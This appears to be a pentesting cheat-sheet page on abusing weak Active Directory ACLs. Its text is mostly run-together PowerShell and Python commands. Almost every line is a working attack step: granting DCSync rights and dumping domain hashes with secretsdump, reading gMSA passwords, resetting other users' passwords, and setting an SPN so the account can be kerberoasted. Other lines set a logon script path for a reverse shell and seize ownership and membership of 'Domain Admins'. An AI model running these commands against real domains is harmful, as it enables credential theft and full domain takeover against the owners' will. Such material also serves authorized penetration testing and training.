Abuse Weak Access Control Lists (ACLs)
Last updated
Last updated
$SecPassword = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUser,$SecPasswordAdd-ObjectACL -PrincipalIdentity compromiseduser -Credential $cred -Rights DCSyncFrom the attacking box
secretsdumps.py $domain/user@$ipFrom the attacking box
secretsdump.py domain/user@ipOr use Mimikatz
You may need to use ntpdate $domain if you get clockscrew error
python2 /opt/gMSADumper/gMSADumper.py -d $domain -u CompromisedUser -p Password.\GMSAPasswordReader.exe --AccountName 'ReadGMSApassword_Rights_To_User'$CompromisedUserName = 'CompromisedUserName'$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPass$LateralEscUserPass = ConvertTo-SecureString 'LateralEscUserPass' -AsPlainText -ForceSet-DomainUserPassword -Identity LateralEscUserName -AccountPassword $LateralEscUserPass -Credential $Cred$CompromisedUserName = 'CompromisedUserName'$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPassInvoke-Command -computername 127.0.0.1 -ScriptBlock {Set-ADAccountPassword -Identity LateralEscUserName -reset -NewPassword (ConvertTo-SecureString -AsPlainText 'password' -force)} -Credential $credUse this for reverseshell using scriptpath=, enumeration, or use serviceprincipalname= for kerberoast
$CompromisedUserName = 'CompromisedUserName'$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPassSet-DomainObject -Credential $Cred -Identity LateralEscUserName -SET @{serviceprincipalname='thescriptkid/thescriptkid'}Get-DomainSPNTicket -Credential $Cred LateralEscUserName | flSet-DomainObject -Credential $Cred -Identity LateralEscUserName -SET @{scriptpath='C:\\path\\to\\script.ps1'}$CompromisedUserName = 'CompromisedUserName'$CompromisedUserPass = ConvertTo-SecureString 'CompromisedUserPass' -AsPlainText -Force$Cred = New-Object System.Management.Automation.PSCredential $CompromisedUserName,$CompromisedUserPassSet-DomainObjectOwner -Credential $Cred -Identity "Domain Admins" -OwnerIdentity CompromisedUserAdd-DomainObjectAcl -Credential $Cred -TargetIdentity "Domain Admins" -PrincipalIdentity CompromisedUser -Rights AllAdd-DomainGroupMember -Identity 'Domain Admins' -Members 'CompromisedUser' -Credential $CredFind ACLs of interest whether it be the current compromised user, or users found. start with current user.
Find-InterestingDomainAcl -ResolveGUIDs | where-object {$_.identityreferencename -like "*CompromisedUser*"}Find-InterestingDomainAcl -ResolveGUIDs | where-object {$_.ActiveDirectoryRights -like "*GenericAll*"} | Where-Object {$_.identityreferenceclass -ne "computer"}